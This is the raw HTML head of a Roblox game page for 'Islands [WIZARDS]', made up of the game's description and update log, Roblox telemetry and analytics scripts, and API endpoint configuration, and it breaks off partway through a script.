# Roblox
<html><body style="margin: 0;"><!DOCTYPE html><!--[if IE 8]><html class=ie8 ng-app=robloxApp><![endif]--> <!--[if gt IE 8]><!--><html><!--<![endif]--><head data-machine-id=WEB1776><title>Islands &#129497;‍♂️ [WIZARDS] - Roblox</title><meta http-equiv=X-UA-Compatible content="IE=edge,requiresActiveX=true"><meta charset=UTF-8><meta name=viewport content="width=device-width, initial-scale=1"><meta name=author content="Roblox Corporation"><meta name=description content="Check out Islands 🧙‍♂️ [WIZARDS]. It’s one of the millions of unique, user-generated 3D experiences created on Roblox. Welcome to Islands!

🌲 Build your own island
👩‍🌾 Create huge farms
💸 Sell items to make money
👨‍🍳 Cook tasty delicacies
✨ Forage valuable items
🔥 And more!

🧙‍♂️ Update Log (July 17): 
- Wizard Lizard Mob
- Spellbook
- Mushroom &amp; Mushroom Block
- Foraging Items (acorn &amp; horseradish)
- New flowers (daffodil &amp; crocus)
- Added a tutorial for new players
- Bug fixes"><meta name=keywords content="free games,online games,building games,virtual worlds,free mmo,gaming cloud,physics engine"><meta name=apple-itunes-app content="app-id=431946152"><script type=application/ld+json>
    {
    "@context" : "http://schema.org",
    "@type" : "Organization",
    "name" : "Roblox",
    "url" : "https://www.roblox.com/",
    "logo": "https://images.rbxcdn.com/c69b74f49e785df33b732273fad9dbe0.png",
    "sameAs" : [
    "https://www.facebook.com/ROBLOX/",
    "https://twitter.com/roblox",
    "https://www.linkedin.com/company/147977",
    "https://www.instagram.com/roblox/",
    "https://www.youtube.com/user/roblox",
    "https://plus.google.com/+roblox",
    "https://www.twitch.tv/roblox"
    ]
    }
</script><meta property=og:site_name content=ROBLOX><meta property=og:title content="Islands 🧙‍♂️ [WIZARDS]"><meta property=og:type content=game><meta property=og:url content=https://www.roblox.com/games/4872321990/Islands-WIZARDS><meta property=og:description content="Check out Islands 🧙‍♂️ [WIZARDS]. It’s one of the millions of unique, user-generated 3D experiences created on Roblox. Welcome to Islands!

🌲 Build your own island
👩‍🌾 Create huge farms
💸 Sell items to make money
👨‍🍳 Cook tasty delicacies
✨ Forage valuable items
🔥 And more!

🧙‍♂️ Update Log (July 17): 
- Wizard Lizard Mob
- Spellbook
- Mushroom &amp; Mushroom Block
- Foraging Items (acorn &amp; horseradish)
- New flowers (daffodil &amp; crocus)
- Added a tutorial for new players
- Bug fixes"><meta property=og:image content=https://t4.rbxcdn.com/4c636f02545addd0b8df0475eae415e8><meta property=fb:app_id content=190191627665278><meta name=twitter:card content=summary_large_image><meta name=twitter:site content=@ROBLOX><meta name=twitter:title content="Islands 🧙‍♂️ [WIZARDS]"><meta name=twitter:description content="Check out Islands 🧙‍♂️ [WIZARDS]. It’s one of the millions of unique, user-generated 3D experiences created on Roblox. Welcome to Islands!

🌲 Build your own island
👩‍🌾 Create huge farms
💸 Sell items to make money
👨‍🍳 Cook tasty delicacies
✨ Forage valuable items
🔥 And more!

🧙‍♂️ Update Log (July 17): 
- Wizard Lizard Mob
- Spellbook
- Mushroom &amp; Mushroom Block
- Foraging Items (acorn &amp; horseradish)
- New flowers (daffodil &amp; crocus)
- Added a tutorial for new players
- Bug fixes"><meta name=twitter:creator><meta name=twitter:image1 content=https://t4.rbxcdn.com/4c636f02545addd0b8df0475eae415e8><meta name=twitter:app:country content=US><meta name=twitter:app:name:iphone content="ROBLOX Mobile"><meta name=twitter:app:id:iphone content=431946152><meta name=twitter:app:url:iphone content="robloxmobile://placeID=4872321990"><meta name=twitter:app:name:ipad content="ROBLOX Mobile"><meta name=twitter:app:id:ipad content=431946152><meta name=twitter:app:url:ipad content="robloxmobile://placeID=4872321990"><meta name=twitter:app:name:googleplay content=ROBLOX><meta name=twitter:app:id:googleplay content=com.roblox.client><meta name=twitter:app:url:googleplay content="robloxmobile://placeID=4872321990"><meta name=locale-data data-language-code=en_us data-language-name=English><meta name=device-meta data-device-type=computer data-is-in-app=false data-is-desktop=true data-is-phone=false data-is-tablet=false data-is-console=false data-is-android-app=false data-is-ios-app=false data-is-uwp-app=false data-is-xbox-app=false data-is-amazon-app=false data-is-win32-app=false data-is-studio=false data-is-game-client-browser=false data-is-ios-device=false data-is-android-device=false data-is-universal-app=false data-app-type=unknown><meta name=environment-meta data-is-testing-site=false><meta id=roblox-display-names data-enabled=false><meta name=page-meta data-internal-page-name=GameDetail><script>var Roblox=Roblox||{};Roblox.BundleVerifierConstants={isMetricsApiEnabled:true,eventStreamUrl:"//ecsv2.roblox.com/pe?t=diagnostic",deviceType:"Computer",cdnLoggingEnabled:JSON.parse("true")};</script><script>var Roblox=Roblox||{};Roblox.BundleDetector=(function(){var isMetricsApiEnabled=Roblox.BundleVerifierConstants&&Roblox.BundleVerifierConstants.isMetricsApiEnabled;var loadStates={loadSuccess:"loadSuccess",loadFailure:"loadFailure",executionFailure:"executionFailure"};var bundleContentTypes={javascript:"javascript",css:"css"};var ephemeralCounterNames={cdnPrefix:"CDNBundleError_",unknown:"CDNBundleError_unknown",cssError:"CssBundleError",jsError:"JavascriptBundleError",jsFileError:"JsFileExecutionError",resourceError:"ResourcePerformance_Error",resourceLoaded:"ResourcePerformance_Loaded"};return{jsBundlesLoaded:{},bundlesReported:{},counterNames:ephemeralCounterNames,loadStates:loadStates,bundleContentTypes:bundleContentTypes,timing:undefined,setTiming:function(windowTiming){this.timing=windowTiming;},getLoadTime:function(){if(this.timing&&this.timing.domComplete){return this.getCurrentTime()-this.timing.domComplete;}},getCurrentTime:function(){return new Date().getTime();},getCdnProviderName:function(bundleUrl,callBack){if(Roblox.BundleVerifierConstants.cdnLoggingEnabled){var xhr=new XMLHttpRequest();xhr.open('GET',bundleUrl,true);xhr.onreadystatechange=function(){if(xhr.readyState===xhr.HEADERS_RECEIVED){try{var headerValue=xhr.getResponseHeader("rbx-cdn-provider");if(headerValue){callBack(headerValue);}else{callBack();}}catch(e){callBack();}}};xhr.onerror=function(){callBack();};xhr.send();}else{callBack();}},getCdnProviderAndReportMetrics:function(bundleUrl,bundleName,loadState,bundleContentType){this.getCdnProviderName(bundleUrl,function(cdnProviderName){Roblox.BundleDetector.reportMetrics(bundleUrl,bundleName,loadState,bundleContentType,cdnProviderName);});},reportMetrics:function(bundleUrl,bundleName,loadState,bundleContentType,cdnProviderName){if(!isMetricsApiEnabled||!bundleUrl||!loadState||!loadStates.hasOwnProperty(loadState)||!bundleContentType||!bundleContentTypes.hasOwnProperty(bundleContentType)){return;}
var xhr=new XMLHttpRequest();var metricsApiUrl=(Roblox.EnvironmentUrls&&Roblox.EnvironmentUrls.metricsApi)||"https://metrics.roblox.com";xhr.open("POST",metricsApiUrl+"/v1/bundle-metrics/report",true);xhr.setRequestHeader("Content-Type","application/json");xhr.withCredentials=true;xhr.send(JSON.stringify({bundleUrl:bundleUrl,bundleName:bundleName||"",bundleContentType:bundleContentType,loadState:loadState,cdnProviderName:cdnProviderName,loadTimeInMilliseconds:this.getLoadTime()||0}));},logToEphemeralStatistics:function(sequenceName,value){var deviceType=Roblox.BundleVerifierConstants.deviceType;sequenceName+="_"+deviceType;var xhr=new XMLHttpRequest();xhr.open('POST','/game/report-stats?name='+sequenceName+"&value="+value,true);xhr.withCredentials=true;xhr.send();},logToEphemeralCounter:function(ephemeralCounterName){var deviceType=Roblox.BundleVerifierConstants.deviceType;ephemeralCounterName+="_"+deviceType;var xhr=new XMLHttpRequest();xhr.open('POST','/game/report-event?name='+ephemeralCounterName,true);xhr.withCredentials=true;xhr.send();},logToEventStream:function(failedBundle,ctx,cdnProvider,status){var esUrl=Roblox.BundleVerifierConstants.eventStreamUrl,currentPageUrl=encodeURIComponent(window.location.href);var deviceType=Roblox.BundleVerifierConstants.deviceType;ctx+="_"+deviceType;var duration=0;if(window.performance){var perfTiming=window.performance.getEntriesByName(failedBundle);if(perfTiming.length>0){var data=perfTiming[0];duration=data.duration||0;}}
var params="&evt=webBundleError&url="+currentPageUrl+"&ctx="+ctx+"&fileSourceUrl="+encodeURIComponent(failedBundle)+"&cdnName="+(cdnProvider||"unknown")+"&statusCode="+(status||"unknown")+"&loadDuration="+Math.floor(duration);var img=new Image();img.src=esUrl+params;},getCdnInfo:function(failedBundle,ctx,fileType){if(Roblox.BundleVerifierConstants.cdnLoggingEnabled){var xhr=new XMLHttpRequest();var counter=this.counterNames;xhr.open('GET',failedBundle,true);var cdnProvider;xhr.onreadystatechange=function(){if(xhr.readyState===xhr.HEADERS_RECEIVED){cdnProvider=xhr.getResponseHeader("rbx-cdn-provider");if(cdnProvider&&cdnProvider.length>0){Roblox.BundleDetector.logToEphemeralCounter(counter.cdnPrefix+cdnProvider+"_"+fileType);}
else{Roblox.BundleDetector.logToEphemeralCounter(counter.unknown+"_"+fileType);}}
else if(xhr.readyState===xhr.DONE){Roblox.BundleDetector.logToEventStream(failedBundle,ctx,cdnProvider,xhr.status);}};xhr.onerror=function(){Roblox.BundleDetector.logToEphemeralCounter(counter.unknown+"_"+fileType);Roblox.BundleDetector.logToEventStream(failedBundle,ctx,counter.unknown);};xhr.send();}
else{this.logToEventStream(failedBundle,ctx);}},reportResourceError:function(resourceName){var ephemeralCounterName=this.counterNames.resourceError+"_"+resourceName;this.logToEphemeralCounter(ephemeralCounterName);},reportResourceLoaded:function(resourceName){var loadTimeInMs=this.getLoadTime();if(loadTimeInMs){var sequenceName=this.counterNames.resourceLoaded+"_"+resourceName;this.logToEphemeralStatistics(sequenceName,loadTimeInMs);}},reportBundleError:function(bundleTag){var ephemeralCounterName,failedBundle,ctx,contentType;if(bundleTag.rel&&bundleTag.rel==="stylesheet"){ephemeralCounterName=this.counterNames.cssError;failedBundle=bundleTag.href;ctx="css";contentType=bundleContentTypes.css;}else{ephemeralCounterName=this.counterNames.jsError;failedBundle=bundleTag.src;ctx="js";contentType=bundleContentTypes.javascript;}
this.bundlesReported[failedBundle]=true;this.logToEphemeralCounter(ephemeralCounterName);this.getCdnInfo(failedBundle,ctx,ctx);var bundleName;if(bundleTag.dataset){bundleName=bundleTag.dataset.bundlename;}
else{bundleName=bundleTag.getAttribute('data-bundlename');}
this.getCdnProviderAndReportMetrics(failedBundle,bundleName,loadStates.loadFailure,contentType);},bundleDetected:function(bundleName){this.jsBundlesLoaded[bundleName]=true;},verifyBundles:function(document){var ephemeralCounterName=this.counterNames.jsFileError,eventContext=ephemeralCounterName;var scripts=(document&&document.scripts)||window.document.scripts;var errorsList=[];var bundleName;var monitor;for(var i=0;i<scripts.length;i++){var item=scripts[i];if(item.dataset){bundleName=item.dataset.bundlename;monitor=item.dataset.monitor;}
else{bundleName=item.getAttribute('data-bundlename');monitor=item.getAttribute('data-monitor');}
if(item.src&&monitor&&bundleName){if(!Roblox.BundleDetector.jsBundlesLoaded.hasOwnProperty(bundleName)){errorsList.push(item);}}}
if(errorsList.length>0){for(var j=0;j<errorsList.length;j++){var script=errorsList[j];if(!this.bundlesReported[script.src]){this.logToEphemeralCounter(ephemeralCounterName);this.getCdnInfo(script.src,eventContext,'js');if(script.dataset){bundleName=script.dataset.bundlename;}
else{bundleName=script.getAttribute('data-bundlename');}
this.getCdnProviderAndReportMetrics(script.src,bundleName,loadStates.executionFailure,bundleContentTypes.javascript);}}}}};})();window.addEventListener("load",function(evt){Roblox.BundleDetector.verifyBundles();});Roblox.BundleDetector.setTiming(window.performance.timing);</script><link href=https://images.rbxcdn.com/23421382939a9f4ae8bbe60dbe2a3e7e.ico.gzip rel=icon><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=StyleGuide href=https://css.rbxcdn.com/eae0f5d559667d422bdd7831e146a36df0295fc3998748ee6484a5126571b0cc.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=Thumbnails href=https://css.rbxcdn.com/872e08cfb833578ce262269ca0c40e46d6888d5abb201cf238fe00f9abfba826.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=Footer href=https://css.rbxcdn.com/55b250e8473888792f885d898973a13692fb22157baf61aaffa62ce4545f3408.css><link rel=canonical href=https://www.roblox.com/games/4872321990/Islands-WIZARDS><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet href=https://static.rbxcdn.com/css/leanbase___3678d89e5ec3f4d8c65d863691f31de2_m.css/fetch><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet href=https://static.rbxcdn.com/css/page___43720aef8f540dc65973b0865f2f6dbd_m.css/fetch><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=Captcha href=https://css.rbxcdn.com/ac68f7b9c22c31c6a73551a5a0cefd58c9436c457e2817922cfea665cb2893dd.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=GameBadges href=https://css.rbxcdn.com/db13003862c0b002c3401c68cc1e8b6a81ad4c087e1d64b13e06dc303553528a.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=SocialLinksJumbotron href=https://css.rbxcdn.com/95486eb68116a28cd1c423e3d50696872e5ca1268671267b52c54554bf09cb75.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=RobuxIcon href=https://css.rbxcdn.com/3f27251ce64d1aedcaabe204116653a48c5faa3bf006fa2aa180b29f48e528c3.css><link onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) rel=stylesheet data-bundlename=Login href=https://css.rbxcdn.com/e0bcc553b7b9a1dd061c6ade9b1da1fcd7a10d3c86940c321b8823d97689038a.css><script>var Roblox=Roblox||{};Roblox.EnvironmentUrls=Roblox.EnvironmentUrls||{};Roblox.EnvironmentUrls={"abtestingApiSite":"https://abtesting.roblox.com","accountInformationApi":"https://accountinformation.roblox.com","accountSettingsApi":"https://accountsettings.roblox.com","adConfigurationApi":"https://adconfiguration.roblox.com","adsApi":"https://ads.roblox.com","apiGatewayUrl":"https://apis.roblox.com","apiProxyUrl":"https://api.roblox.com","assetDeliveryApi":"https://assetdelivery.roblox.com","authApi":"https://auth.roblox.com","authAppSite":"https://authsite.roblox.com","avatarApi":"https://avatar.roblox.com","badgesApi":"https://badges.roblox.com","billingApi":"https://billing.roblox.com","captchaApi":"https://captcha.roblox.com","catalogApi":"https://catalog.roblox.com","chatApi":"https://chat.roblox.com","contactsApi":"https://contacts.roblox.com","contentStoreApi":"https://contentstore.roblox.com","developApi":"https://develop.roblox.com","domain":"roblox.com","economyApi":"https://economy.roblox.com","economycreatorstatsApi":"https://economycreatorstats.roblox.com","engagementPayoutsApi":"https://engagementpayouts.roblox.com","followingsApi":"https://followings.roblox.com","friendsApi":"https://friends.roblox.com","friendsAppSite":"https://friendsite.roblox.com","gamesApi":"https://games.roblox.com","gameInternationalizationApi":"https://gameinternationalization.roblox.com","groupsApi":"https://groups.roblox.com","inventoryApi":"https://inventory.roblox.com","itemConfigurationApi":"https://itemconfiguration.roblox.com","localeApi":"https://locale.roblox.com","localizationTablesApi":"https://localizationtables.roblox.com","metricsApi":"https://metrics.roblox.com","midasApi":"https://midas.roblox.com","notificationApi":"https://notifications.roblox.com","premiumFeaturesApi":"https://premiumfeatures.roblox.com","presenceApi":"https://presence.roblox.com","publishApi":"https://publish.roblox.com","screenTimeApi":"https://apis.rcs.roblox.com/screen-time-api","thumbnailsApi":"https://thumbnails.roblox.com","tradesApi":"https://trades.roblox.com","translationRolesApi":"https://translationroles.roblox.com","universalAppConfigurationApi":"https://apis.roblox.com/universal-app-configuration","usersApi":"https://users.roblox.com","voiceApi":"https://voice.roblox.com","websiteUrl":"https://www.roblox.com","privateMessagesApi":"https://privatemessages.roblox.com","shareApi":"https://share.roblox.com","chatModerationApi":"https://chatmoderation.roblox.com","groupsModerationApi":"https://groupsmoderation.roblox.com"};var additionalUrls={amazonStoreLink:"https://www.amazon.com/Roblox-Corporation/dp/B00NUF4YOA",appProtocolUrl:"robloxmobile://",appStoreLink:"https://itunes.apple.com/us/app/roblox-mobile/id431946152",googlePlayStoreLink:"https://play.google.com/store/apps/details?id=com.roblox.client&amp;hl=en",iosAppStoreLink:"https://itunes.apple.com/us/app/roblox-mobile/id431946152",windowsStoreLink:"https://www.microsoft.com/en-us/store/games/roblox/9nblgggzm6wm",xboxStoreLink:"https://www.microsoft.com/en-us/p/roblox/bq1tn1t79v9k",amazonWebStoreLink:"https://www.amazon.com/roblox?&amp;_encoding=UTF8&amp;tag=r05d13-20&amp;linkCode=ur2&amp;linkId=4ba2e1ad82f781c8e8cc98329b1066d0&amp;camp=1789&amp;creative=9325"}
for(var urlName in additionalUrls){Roblox.EnvironmentUrls[urlName]=additionalUrls[urlName];}</script><script>var Roblox=Roblox||{};Roblox.GaEventSettings={gaDFPPreRollEnabled:"false"==="true",gaLaunchAttemptAndLaunchSuccessEnabled:"false"==="true",gaPerformanceEventEnabled:"false"==="true"};</script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=headerinit src=https://js.rbxcdn.com/90ad5f1b3d18c39c3f9e0ef6d60ab071.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Polyfill src=https://js.rbxcdn.com/8882aff3df88857d3f40ad34a7551002805708bb49bfd90bfd78a878df7ea77a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=HeaderScripts src=https://js.rbxcdn.com/db5218c3fbccfaa300942c9c11f581d29079dcf3d27e2b69c410f10ba3aff8d4.js></script><meta name=lightstep-meta data-access-token=SIyZ5LfLkqXURNj6Y6j867iNKfgSrzG+L3NrG/PDfjBOtqMfmSL8yZ+2fVCnzP+O0P4TiM83QEqlbHOpiM+8Ne98lM0aNHSyFAmLJobK data-service-name=Web-Prod data-tracer-enabled=false><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Lightstep src=https://js.rbxcdn.com/521363f7b895f4d480a7b09794775558093bd166c9b319ae5285e20dd3c8f000.js></script><meta name=viewport content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"><script>var Roblox=Roblox||{};Roblox.AdsHelper=Roblox.AdsHelper||{};Roblox.AdsLibrary=Roblox.AdsLibrary||{};Roblox.AdsHelper.toggleAdsSlot=function(slotId,GPTRandomSlotIdentifier){var gutterAdsEnabled=false;if(gutterAdsEnabled){googletag.display(GPTRandomSlotIdentifier);return;}
if(typeof slotId!=='undefined'&&slotId&&slotId.length>0){var slotElm=$("#"+slotId);if(slotElm.is(":visible")){googletag.display(GPTRandomSlotIdentifier);}else{var adParam=Roblox.AdsLibrary.adsParameters[slotId];if(adParam){adParam.template=slotElm.html();slotElm.empty();}}}}</script><meta property=al:ios:url content="robloxmobile://placeID=4872321990"><meta property=al:ios:app_store_id content=431946152><meta property=al:ios:app_name content="Roblox Mobile"><meta property=al:web:should_fallback content=false><!--[if lt IE 9]><script src=//oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js></script><script src=//oss.maxcdn.com/respond/1.4.2/respond.min.js></script><![endif]--><script>var Roblox=Roblox||{};(function(){var dnt=navigator.doNotTrack||window.doNotTrack||navigator.msDoNotTrack;if(typeof window.external!=="undefined"&&typeof window.external.msTrackingProtectionEnabled!=="undefined"){dnt=dnt||window.external.msTrackingProtectionEnabled();}
Roblox.browserDoNotTrack=dnt=="1"||dnt=="yes"||dnt===true;})();</script><script>var _gaq=_gaq||[];window.GoogleAnalyticsDisableRoblox2=true;_gaq.push(['b._setAccount','UA-486632-1']);_gaq.push(['b._setSampleRate','10']);_gaq.push(['b._setCampSourceKey','rbx_source']);_gaq.push(['b._setCampMediumKey','rbx_medium']);_gaq.push(['b._setCampContentKey','rbx_campaign']);_gaq.push(['b._setDomainName','roblox.com']);_gaq.push(['b._setCustomVar',1,'Visitor','Anonymous',2]);_gaq.push(['b._setPageGroup',1,'GameDetail']);_gaq.push(['b._trackPageview']);_gaq.push(['c._setAccount','UA-26810151-2']);_gaq.push(['c._setSampleRate','1']);_gaq.push(['c._setDomainName','roblox.com']);_gaq.push(['c._setPageGroup',1,'GameDetail']);(function(){if(!Roblox.browserDoNotTrack){var ga=document.createElement('script');ga.type='text/javascript';ga.async=true;ga.src=('https:'==document.location.protocol?'https://ssl':'http://www')+'.google-analytics.com/ga.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ga,s);}})();</script><script async src="https://www.googletagmanager.com/gtag/js?id=AW-1065449093"></script><script>var accountCode="AW-1065449093";var signupConversionEventKey="wmuJCO3CZBCF7YX8Aw";var webPurchaseConversionEventKey="XDQ_CJme6s0BEIXthfwD";window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}
gtag.conversionEvents={signupConversionEvent:accountCode+'/'+signupConversionEventKey,webPurchaseConversionEvent:accountCode+'/'+webPurchaseConversionEventKey}
gtag('js',new Date());gtag('config',accountCode);</script><script>if(Roblox&&Roblox.EventStream){Roblox.EventStream.Init("//ecsv2.roblox.com/www/e.png","//ecsv2.roblox.com/www/e.png","//ecsv2.roblox.com/pe?t=studio","//ecsv2.roblox.com/pe?t=diagnostic");}</script><script>if(Roblox&&Roblox.PageHeartbeatEvent){Roblox.PageHeartbeatEvent.Init([2,8,20,60]);}</script><script>if(typeof(Roblox)==="undefined"){Roblox={};}
Roblox.Endpoints=Roblox.Endpoints||{};Roblox.Endpoints.Urls=Roblox.Endpoints.Urls||{};Roblox.Endpoints.Urls['/asset/']='https://assetgame.roblox.com/asset/';Roblox.Endpoints.Urls['/client-status/set']='https://www.roblox.com/client-status/set';Roblox.Endpoints.Urls['/client-status']='https://www.roblox.com/client-status';Roblox.Endpoints.Urls['/game/']='https://assetgame.roblox.com/game/';Roblox.Endpoints.Urls['/game/edit.ashx']='https://assetgame.roblox.com/game/edit.ashx';Roblox.Endpoints.Urls['/game/placelauncher.ashx']='https://assetgame.roblox.com/game/placelauncher.ashx';Roblox.Endpoints.Urls['/game/preloader']='https://assetgame.roblox.com/game/preloader';Roblox.Endpoints.Urls['/game/report-stats']='https://assetgame.roblox.com/game/report-stats';Roblox.Endpoints.Urls['/game/report-event']='https://assetgame.roblox.com/game/report-event';Roblox.Endpoints.Urls['/game/updateprerollcount']='https://assetgame.roblox.com/game/updateprerollcount';Roblox.Endpoints.Urls['/login/default.aspx']='https://www.roblox.com/login/default.aspx';Roblox.Endpoints.Urls['/my/avatar']='https://www.roblox.com/my/avatar';Roblox.Endpoints.Urls['/my/money.aspx']='https://www.roblox.com/my/money.aspx';Roblox.Endpoints.Urls['/navigation/userdata']='https://www.roblox.com/navigation/userdata';Roblox.Endpoints.Urls['/chat/chat']='https://www.roblox.com/chat/chat';Roblox.Endpoints.Urls['/chat/data']='https://www.roblox.com/chat/data';Roblox.Endpoints.Urls['/friends/list']='https://www.roblox.com/friends/list';Roblox.Endpoints.Urls['/navigation/getcount']='https://www.roblox.com/navigation/getCount';Roblox.Endpoints.Urls['/regex/email']='https://www.roblox.com/regex/email';Roblox.Endpoints.Urls['/catalog/browse.aspx']='https://www.roblox.com/catalog/browse.aspx';Roblox.Endpoints.Urls['/catalog/html']='https://search.roblox.com/catalog/html';Roblox.Endpoints.Urls['/catalog/json']='https://search.roblox.com/catalog/json';Roblox.Endpoints.Urls['/catalog/contents']='https://search.roblox.com/catalog/contents';Roblox.Endpoints.Urls['/catalog/lists.aspx']='https://search.roblox.com/catalog/lists.aspx';Roblox.Endpoints.Urls['/catalog/items']='https://search.roblox.com/catalog/items';Roblox.Endpoints.Urls['/asset-hash-thumbnail/image']='https://assetgame.roblox.com/asset-hash-thumbnail/image';Roblox.Endpoints.Urls['/asset-hash-thumbnail/json']='https://assetgame.roblox.com/asset-hash-thumbnail/json';Roblox.Endpoints.Urls['/asset-thumbnail-3d/json']='https://assetgame.roblox.com/asset-thumbnail-3d/json';Roblox.Endpoints.Urls['/asset-thumbnail/image']='https://assetgame.roblox.com/asset-thumbnail/image';Roblox.Endpoints.Urls['/asset-thumbnail/json']='https://assetgame.roblox.com/asset-thumbnail/json';Roblox.Endpoints.Urls['/asset-thumbnail/url']='https://assetgame.roblox.com/asset-thumbnail/url';Roblox.Endpoints.Urls['/asset/request-thumbnail-fix']='https://assetgame.roblox.com/asset/request-thumbnail-fix';Roblox.Endpoints.Urls['/avatar-thumbnail-3d/json']='https://www.roblox.com/avatar-thumbnail-3d/json';Roblox.Endpoints.Urls['/avatar-thumbnail/image']='https://www.roblox.com/avatar-thumbnail/image';Roblox.Endpoints.Urls['/avatar-thumbnail/json']='https://www.roblox.com/avatar-thumbnail/json';Roblox.Endpoints.Urls['/avatar-thumbnails']='https://www.roblox.com/avatar-thumbnails';Roblox.Endpoints.Urls['/avatar/request-thumbnail-fix']='https://www.roblox.com/avatar/request-thumbnail-fix';Roblox.Endpoints.Urls['/bust-thumbnail/json']='https://www.roblox.com/bust-thumbnail/json';Roblox.Endpoints.Urls['/group-thumbnails']='https://www.roblox.com/group-thumbnails';Roblox.Endpoints.Urls['/groups/getprimarygroupinfo.ashx']='https://www.roblox.com/groups/getprimarygroupinfo.ashx';Roblox.Endpoints.Urls['/headshot-thumbnail/json']='https://www.roblox.com/headshot-thumbnail/json';Roblox.Endpoints.Urls['/item-thumbnails']='https://www.roblox.com/item-thumbnails';Roblox.Endpoints.Urls['/outfit-thumbnail/json']='https://www.roblox.com/outfit-thumbnail/json';Roblox.Endpoints.Urls['/place-thumbnails']='https://www.roblox.com/place-thumbnails';Roblox.Endpoints.Urls['/thumbnail/asset/']='https://www.roblox.com/thumbnail/asset/';Roblox.Endpoints.Urls['/thumbnail/avatar-headshot']='https://www.roblox.com/thumbnail/avatar-headshot';Roblox.Endpoints.Urls['/thumbnail/avatar-headshots']='https://www.roblox.com/thumbnail/avatar-headshots';Roblox.Endpoints.Urls['/thumbnail/user-avatar']='https://www.roblox.com/thumbnail/user-avatar';Roblox.Endpoints.Urls['/thumbnail/resolve-hash']='https://www.roblox.com/thumbnail/resolve-hash';Roblox.Endpoints.Urls['/thumbnail/place']='https://www.roblox.com/thumbnail/place';Roblox.Endpoints.Urls['/thumbnail/get-asset-media']='https://www.roblox.com/thumbnail/get-asset-media';Roblox.Endpoints.Urls['/thumbnail/remove-asset-media']='https://www.roblox.com/thumbnail/remove-asset-media';Roblox.Endpoints.Urls['/thumbnail/set-asset-media-sort-order']='https://www.roblox.com/thumbnail/set-asset-media-sort-order';Roblox.Endpoints.Urls['/thumbnail/place-thumbnails']='https://www.roblox.com/thumbnail/place-thumbnails';Roblox.Endpoints.Urls['/thumbnail/place-thumbnails-partial']='https://www.roblox.com/thumbnail/place-thumbnails-partial';Roblox.Endpoints.Urls['/thumbnail_holder/g']='https://www.roblox.com/thumbnail_holder/g';Roblox.Endpoints.Urls['/users/{id}/profile']='https://www.roblox.com/users/{id}/profile';Roblox.Endpoints.Urls['/service-workers/push-notifications']='https://www.roblox.com/service-workers/push-notifications';Roblox.Endpoints.Urls['/notification-stream/notification-stream-data']='https://www.roblox.com/notification-stream/notification-stream-data';Roblox.Endpoints.Urls['/api/friends/acceptfriendrequest']='https://www.roblox.com/api/friends/acceptfriendrequest';Roblox.Endpoints.Urls['/api/friends/declinefriendrequest']='https://www.roblox.com/api/friends/declinefriendrequest';Roblox.Endpoints.Urls['/authentication/is-logged-in']='https://www.roblox.com/authentication/is-logged-in';Roblox.Endpoints.addCrossDomainOptionsToAllRequests=true;</script><script>if(typeof(Roblox)==="undefined"){Roblox={};}
Roblox.Endpoints=Roblox.Endpoints||{};Roblox.Endpoints.Urls=Roblox.Endpoints.Urls||{};</script><script>Roblox=Roblox||{};Roblox.AbuseReportPVMeta={desktopEnabled:false,phoneEnabled:false,inAppEnabled:false};</script><body id=rbx-body class="rbx-body light-theme gotham-font" data-performance-relative-value=0.005 data-internal-page-name=GameDetail data-send-event-percentage=0><div id=roblox-linkify data-enabled=true data-regex="(https?\:\/\/)?(?:www\.)?([a-z0-9-]{2,}\.)*(((m|de|www|web|api|blog|wiki|corp|polls|bloxcon|developer|devforum|forum)\.roblox\.com|robloxlabs\.com)|(www\.shoproblox\.com)|(roblox\.status\.io)|(rblx\.co)|help\.roblox\.com(?![A-Za-z0-9\/.]*\/attachments\/))(?!\/[A-Za-z0-9-+&amp;@#\/=~_|!:,.;]*%)((\/[A-Za-z0-9-+&amp;@#\/%?=~_|!:,.;]*)|(?=\s|\b))" data-regex-flags=gm data-as-http-regex=(([^.]help|polls)\.roblox\.com)></div><div id=image-retry-data data-image-retry-max-times=30 data-image-retry-timer=500 data-ga-logging-percent=10></div><div id=http-retry-data data-http-retry-max-timeout=0 data-http-retry-base-timeout=0 data-http-retry-max-times=1></div><div id=fb-root></div><div id=wrap class="wrap no-gutter-ads logged-out" data-gutter-ads-enabled=false><div id=SocialIdentitiesInformation data-rbx-login-redirect-url=/social/postlogin data-context=loginDropdown></div><script src="https://roblox-api.arkoselabs.com/fc/api/?onload=reportFunCaptchaLoaded" async onerror="Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportResourceError('funcaptcha')"></script><script>var Roblox=Roblox||{};$(function(){var funCaptcha=Roblox.FunCaptcha;if(funCaptcha){var 